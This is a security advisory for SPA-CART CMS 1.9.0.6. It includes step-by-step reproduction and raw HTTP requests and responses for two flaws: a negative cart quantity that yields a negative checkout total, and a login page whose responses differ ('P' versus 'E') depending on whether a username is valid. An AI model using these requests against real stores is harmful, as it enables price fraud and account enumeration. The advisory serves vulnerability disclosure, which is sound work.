Headline
SPA-CART CMS 1.9.0.6 Username Enumeration / Business Logic Flaw
SPA-CART CMS version 1.9.0.6 suffers from business logic and user enumeration flaws.
Exploit Title: Business Logic Flaw and Username Enumeration in
spa-cartcmsv1.9.0.6
Date: 6/2024
Exploit Author: Andrey Stoykov
Version: 1.9.0.6
Tested on: Ubuntu 22.04
Blog:
https://msecureltd.blogspot.com/2024/04/friday-fun-pentest-series-5-spa.html
http://msecureltd.blogspot.com/
Description
It was found that the application suffers from business logic flaw
Additionally the application is vulnerable to username enumeration on the
login page
Logic Flaw
Steps to Reproduce:
- Checkout page and intercept HTTP POST request
- Add minus quantity such as -10
- The final price would come up as negative value
// HTTP POST request modifying the quantity to negative value
POST /cart/add HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/123.0.6312.122
[…]
productid=225&amount=-10
// HTTP response
HTTP/2 200 OK
Server: nginx
[…]
[…]
<img src="https://demo.spa-cart.com/var/photo/product/234x200/225/695/1.jpg"
alt="" /><b>Five And Two Jewelry Piper Gold-Plated Earrings</b> added to
cart
<br /><br />
<strong class="added_price">Price: <span><span
class="currency">$</span>59.00</span></strong>
<div class="added_options">
<b>Selected options:</b>
Qty: 1<br />
Color: silver gold<br />
</div>
[…]
// HTTP GET request to checkout
GET /checkout HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/123.0.6312.122
[…]
// HTTP response showing negative amount owned
HTTP/2 200 OK
Server: nginx
[…]
[…]
\t<td>silver gold</td>\r\n</tr>\r\n</table>\r\n </td>\r\n <td
class="line" nowrap align="right">\r\n<span
class="currency">$</span>59.00 x -10 =
<span class="currency">$</span>-590.00 </td>
[…]
Username Enumeration:
Steps to Reproduce:
- Register account
- Enter valid account with wrong password
- Trap HTTP request
- Check that response for valid username has “P” message
- Enter invalid account with wrong password
- Check that response for invalid username has “E” message
// HTTP POST request with valid username and wrong password
POST /login HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
[…]
email=test%40test.test&password=test123
// HTTP response showing “P” error message
HTTP/2 200 OK
Server: nginx
[…]
P
// HTTP POST request with invalid username and wrong password
POST /login HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
[…]
email=test%40test.t3st&password=test123
// HTTP response showing “E” error message
HTTP/2 200 OK
Server: nginx
[…]
E